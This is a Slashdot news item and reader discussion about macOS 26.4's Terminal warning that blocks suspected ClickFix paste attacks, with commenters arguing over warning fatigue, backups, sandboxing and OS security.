MacOS 26.4 Adds Warnings For ClickFix Attacks to Its Terminal App

An anonymous Slashdot reader writes: ClickFix attacks are ramping up. These attacks have users copy and paste a string to something that can execute a command line — like the Windows Run dialog, or a shell prompt.

But MacRumors reports that macOS 26.4 Tahoe (updated earlier this week) introduces a new feature to its Terminal app where it will detect ClickFix attempts and stop them by prompting the user if they really wanted to run those commands.
According to MacRumors, the warning readers "Possible malware, Paste blocked."

"Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy...."

There is also a "Paste Anyway" option if users still wish to proceed.

Re:

[buddyglass]

Make it togglable and default to "on". Problem solved.

Re:Please don't

[martin-boundary]

Problem wide open. Microsoft already thought of this solution at least 25 years ago.

They implemented warnings by interrupting the code, opening a pop-up window with two options: proceed or bloc?. I'll give you a guess how that panned out.

There is only one outcome when users are repeatedly interrupted for security reasons. They learn to press yes without even reading the message, while being annoyed by the interruption. Black hats love that.

Re:

[Firethorn]

I remember those days where it would warn if there was any scripting at all, rather than look for dangerous commands first.
Just as a thought, not bothering if the script cannot reach outside of the document itself. Functions that access other files or documents, email functionality, and such triggering the warning instead would have been more effective.

Re:

[bloodhawk]

Those are the sort of assumptions hackers love as invariably the dev can't think of every scenario.

Useless warnings are useless.

[Firethorn]

The problem you get though is what I call the "California Cancer Warning Problem"
Basically, people can only pay attention to so many warnings. The more often people get false or trivial warnings, warnings where they have to continue to get things done as standard, the more likely they are to just plain ignore the warnings.

While hackers might be able to figure out a way to do something malicious without triggering the warning, the warnings back then were worse than useless, because they not only triggered f

Re:

[bloodhawk]

I don't disagree, it really is a choose your poison. You know 100% though that developers will not be able to think of every scenario that should trigger a warning, so in a filtered scenario it just becomes yet another attack vector which invariably leads to even more problems due to a false sense of security.

Re:

[Kyogreex]

I don't think this is really comparable.

Most macOS users probably never touch the terminal and so will hopefully be more likely to read before clicking the red button, and this message doesn't look like a typical macOS elevation prompt.

Re:

[karmawarrior]

I doubt MacOS users are any different from other computer users, especially in the post-touchscreen dumbing down of computer knowledge we're seeing where Zoomers and Boomers, according to some surveys, appear to have the same level of skill on average.

Another issue is I've met many, many, people who insist on asking me "What do I do?" when any prompt comes up. Anything. From "Overwrite these files?" to "Installation finished. Do you want to launch NewlyInstalledApp now?"

I suspect that 90% of the people who

Re:

[Ol Olsoc]

I doubt MacOS users are any different from other computer users, especially in the post-touchscreen dumbing down of computer knowledge we're seeing where Zoomers and Boomers, according to some surveys, appear to have the same level of skill on average.

What does that even mean? As a Boomer, and the boomers around me seem to be pretty darn adroit, I'm having issues parsing what you wrote.

Or do just mean you adhere to some concept that boomers are stupid?

Another issue is I've met many, many, people who insist on asking me "What do I do?" when any prompt comes up. Anything. From "Overwrite these files?" to "Installation finished. Do you want to launch NewlyInstalledApp now?"

And? You sound like the IT guy from Saturday Night Live who hates the people he i

Re: Please don't

[paulatz]

Every time I see my mother in law, she's a list of " I don't know what fo do" problems with her phone. The solution is always the same: I read out loud what is written on the screen, then I ask her if she want it or not, and I click yes or no accordingly.

Re:

[Ol Olsoc]

I don't think this is really comparable.

Most macOS users probably never touch the terminal and so will hopefully be more likely to read before clicking the red button, and this message doesn't look like a typical macOS elevation prompt.

I spend almost as much time in Terminal as I do in the GUI. Sometimes more. So I am very interested in this. BTW, despite the memes, There are more of us Mac users that do that than you think.

Re:

[buddyglass]

The feature isn't targeted toward users who spend all their time in the terminal. Those users are likely already savvy enough to realize you shouldn't paste untrusted text into a terminal window. It's targeted toward non-power users who are completely unfamiliar with the Terminal, i.e. the majority of Mac users.

Re:

[Ol Olsoc]

I think you will find there are way less Mac users that do that than YOU think, this is very niche

If the reality does not fit with your narrative, just write what you wrote.

Re:

[buddyglass]

The corollary is you have to not have too many false positives such that the warning is just a nuisance. Consider: how often does the type of user this is intended to protect (i.e. who would paste random text from a website into a terminal window) "normally" paste text into a Terminal window? Not very often. This warning system would go completely unnoticed for the majority of users in the course of their normal use. When they *do* have occasion to paste text into a Terminal window, ideally, it would *

Re:

[Mr. Dollar Ton]

A similar screen sprung up in the recent (well, perhaps not that recent) Debian updates.

Before that I would paste shit into an empty vim buffer in the terminal, now for simple things I don't even have to.

This reminds me of something

[Powercntrl]

Back in the day, AOL attempted to address phishing scams by putting a disclaimer at the bottom of IM windows. Something along the lines of "Reminder: AOL staff will never ask for your password or billing information". Problem was, people who were foolish enough to fall for social engineering scams don't pay much attention to those sort of warnings, either.

Seems like all the scammers will have to do is update their instructions to include "Please disregard the pop-up and click Paste Anyway".

Re:

[dgatwood]

Reply "yes", then close and reopen this message to activate the link.

No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

• Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say t

Re:

[Ol Olsoc]

Reply "yes", then close and reopen this message to activate the link.

No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

• Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say that.)

You don't like Time Machine? I have hourly backups on one drive, and daily backups on a drive I store in a different location.

I'd never use any cloud backup, that's like asking Jerry Sandusky to babysit a 10 year old boy.

Re:

[dgatwood]

Reply "yes", then close and reopen this message to activate the link.

No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

• Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say that.)

You don't like Time Machine? I have hourly backups on one drive, and daily backups on a drive I store in a different location.

I love Time Machine (except for how slow it is over SMB and how often the disk images corrupt themselves in ways that prevent future backups). Wish it existed on iOS and VisionOS.

Re:

[ameline]

With a huge carve out for war crimes, murder, rape, child molestation, sexual assault, and official corruption. Those should live and last *forever*. Otherwise your "Epstien class" will always get away with everything.

Re:

[unixisc]

My popup count fell drastically once I installed a VPN. Yeah, I still get annoying ads on YouTube, but as far as popups go, they are squelched. Sometimes, particular sites I need to use require me to temporarily disable it so that I can use it, but other than that, it seems to be under control

It's a start

[diffract]

I can imagine Apple later removing the "paste anyway" option and requiring you to go to Settings > Privacy to confirm the action, like how they've done with running apps downloaded off of the internet

Re:

[tlhIngan]

I can imagine Apple later removing the "paste anyway" option and requiring you to go to Settings > Privacy to confirm the action, like how they've done with running apps downloaded off of the internet

It's a function implemented in the shipped terminal.app. If you use a third party terminal app, it won't have the protection. Chances are if you're using a third party terminal you're probably sophisticated enough to not blindly run shell commands

Re:

[dub42]

I believe that you can just right click and press open. That will let you run the application without going to the settings.

And the Apple haters squawk.

[Smonster]

If someone can’t type a long command into a terminal without typos, they probably should not be using a terminal for anything other than basic commands anyway.

Re:And the Apple haters squawk.

[larwe]

True but useless. For a long complex commandline input, it saves a lot of work to be able to paste it in. Not to mention the possibility that a typo might have undesirable consequences.

Re:

[Viol8]

Anyone who just cut and pastes a string of shell commands from some random web page or email into a terminal without checking them first frankly deserves what they get. If you're this dumb stay away from the command line.

Re:

[larwe]

I mentioned nothing about random web pages. In our git repos, there are plenty of internal docs saying "to provision the embedded device, plug it in and run this 200-character commandline". Being able to paste those vs typing them saves a lot of time.

Re: And the Apple haters squawk.

[Viol8]

And you wouldn't check it first particularly if it had to run as root? Oooookay.

Re:

[larwe]

Checking isn't the problem being solved. Sure I check what I run. Being able to check it on the webpage, then cut and paste it, then maybe check again that I cut and pasted correctly - is far less work, and FAR less error prone than having to type it in. Not to mention faster. If I validate it once, I can Ctrl-V multiple times rather than typing it all out again multiple times. Assume that I have sufficient sophistication to insert check steps where appropriate. Blocking me from using a simple memcpy() to d

Re:

[unixisc]

If someone can’t type a long command into a terminal without typos, they probably should not be using a terminal for anything other than basic commands anyway.

Usually, they'd be copying commands from a website or a manual, in which case the typos should not even exist

Question

[ArchieBunker]

Can you disable all the safety features on a modern Mac and have it behave like an old school unix box? You know run su and then accidentally do something dumb? I mean we all survived those days.

Re:

[larwe]

Current versions of MacOS have something called "System Integrity Protection" which restricts certain directories from being tampered with even in a su'd shell. It can be disabled, but it's a very off-label way to run the OS and the consequences could be ... spicy.

Re:Question

[Powercntrl]

You know run su and then accidentally do something dumb?

I'm pretty sure my Mac will let me run su and then send a text to my ex, but I'm not going to try it.

Re:

[caseih]

Yes you can. You have to boot into recovery mode and then change the security level. This is already something you have to do to load third-part (even signed) kexts, which are sometimes required for certain types of presumably poorly written (or not Apple-blessed) hardware drivers.

Apparently this is even still possible on the iPhone chipped MacBook Neo.

Re: hahahaha no

[dwater]

There are other reasons to ship recent versions.

Re: hahahaha no

[reanjr]

I highly doubt this has to do with recent features. It more likely has to do with Mac shipping the BSD version of awk, rather than the GNU version.

Re:

[dub42]

If you monkey around with the terminal you should already have homebrew installed. Then the version of awk is only 3 months old. But that must be too difficult for you since you can’t add pictures to the wallpapers

Linux is insecure

[TheMiddleRoad]

Linux is generally insecure: https://madaidans-insecurities... [github.io] What hardening looks like: https://grapheneos.org/feature... [grapheneos.org] Not that all this makes GrapheneOS perfectly secure, but it's much better than standard Linux distros.

Re: Linux is insecure

[iwulinux]

Linux has served me just fine for three decades. I got rid of my GrapheneOS phone because it constantly got in my way. My threat model does not involve bring pursued by nation state actors, and I don't equate security with having doors slammed in my face all day. Security is not the most important thing in life. Vigilance will serve you much better. As Franklin said, "Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety."

Re:

[SlashbotAgent]

Linux has served me just fine for three decades

Same. But, I can honestly say the same of Windows. Though I never boarded the Mac train, I suspect that the same could be said for that.

I think it has much more to do with the user than the overall security of the operating system.

Re:

[TheMiddleRoad]

GrapheneOS is giving up liberty? WTF?

Re:

[aRTeeNLCH]

Why do you compare GrapheneOS to a standard Linux desktop, instead of to Google Android?

Obviously, if you take a platform that is geared towards running applications from untrusted sources and compare that to a standard Linux desktop distribution that isn't configure for that, you'll find common desktop Linux lacking.

On the other hand, does GrapheneOS or Android have a desktop that's halfway usable?

Historically, Linux got the reputation for being more secure because Microsoft made a number of brain-de

Re:

[drinkypoo]

For the true paranoid, if you need to sandbox, you're doing it wrong.

Everyone is doing it wrong, that's why we need to sandbox.

Even if you were perfect, you wouldn't have time to do everything yourself, so you would still want sandboxing to protect you from the efforts of others.

Re:

[TheMiddleRoad]

The point is a well-designed, more-secure OS. That is independent of having a desktop or not. Linux runs untrusted apps all the time. Supply chain attacks are brutal, no? For the paranoid, if you're not sandboxing, you're doing it wrong.

Re:

[aRTeeNLCH]

I actually don't disagree in spirit, it just seems to me that we have different definitions of truly paranoid.

A colleague of mine with a Windows Linux dual boot machine, games on one side and mail and web on the other, uses a live Linux disc to do e-banking. He's just an informed guy, I wouldn't consider him paranoid at all.

If you're paranoid or actually in the know that "they" are after you, you have to use different machines for different purposes. I mean, one can trust sandboxes only so far, and if y

Re:

[TheMiddleRoad]

Interestingly, a live Linux disc can be imperfect too, if something is installed at boot from BIOS, for instance. Even then, I'd want sandboxing on my live linux boot. There is no perfect security. This is clear. Like how Anthropic's Claude just got released into the wild, all after Anthropic was supposed to be the bug squashers of the universe.

Re:

[aRTeeNLCH]

Agreed on the BIOS infection part. The programs could have been compiled with an infected compiler too. But I don't get why you want sandboxing on your life disc, you mean, inside, to reduce attack surface in case only non essential programs are infected, or running running your life disc in a sandbox, or just out of principle?

Because with all sandboxing, if your operating system isn't clean it's not going to save you from that attack angle. But I'm convinced you know that.

Re:

[TheMiddleRoad]

It's another layer of difficulty for an attack to overcome, one that doesn't usually inconvenience the user. Also, attacks installed in BIOS or the OS aren't necessarily done in some overarching god mode. AFAIK, they often install an app that then does the dirty work, and sandboxing would get in the way of that vector.

Re:

[aRTeeNLCH]

Good point, but would that be equally so if sandboxing were totally the norm? Then every such program would take it into account, right...? I mean, sandboxing just prevents looking sideways, if you're in the lower layers (BIOS, OS) you can look up all the way, or am I missing something?

Re:

[TheMiddleRoad]

That's all security really is, though: making the attacker have to do more work.

Re:

[aRTeeNLCH]

From a certain angle, exactly. Reminds me of a Dutch friend about how many bike locks are required: one more than the bikes left and right of yours...

Re:

[SlashbotAgent]

From your references:

Windows, which is leaning heavily towards Rust, a memory safe language...

This tells me that the article is written by a Rust evangelist and nothing they say can be trusted to be unbiased. Furthermore. Windows, more accurately Microsoft is not leaning heavily toward Rust. Microsoft uses very little Rust in Windows and has stated categorically that there is no intent to re-write Windows in Rust. Windows is mostly written in C/C++/C# with the .Net framework and there is no plan to change that.

Re:

[TheMiddleRoad]

You're some kind of religious zealot? You found the word "Rust" and so everything else is a lie? Microsoft uses Rust where its advantages matter. What's the big deal, snowflake?

Prompt?

[Princeofcups]

The prompt is that little $_, or #, or blinking square, etc. showing you where to type. See VT100 terminals. A shell is the commands and features available by default when using that shell on your terminal. Make sure that you let the shell know what type of terminal it is running on. The command line is that space next to prompt, where you can input shell commands, pass through to system commands, or actually act interactively on a more feature-full terminal like a VT320, for example, a menu that allows

Yeah

[PPH]

These attacks have users copy and paste a string to something that can execute a command line.
.
. ClickFix attempts and stop them by prompting the user if they really wanted to run those commands.

I've seen this on one of my recent Linux installs (Devuan). I get a warning before pasting into a shell prompt. That's not a problem because I know how to inspect text (tiny fonts, etc) copied from an untrusted source before running them*. Unfortunately, it also seems to interfere with the 'copy from terminal' functions. Which makes it a real annoyance.

*I've caught a few of these. And rather than deleting them, I've tweaked some of the concealed commands to see if I can't have some real fun with the origin

Re: Yeah

[reanjr]

Upstream Debian has the same thing in at least one of their primary terminal apps.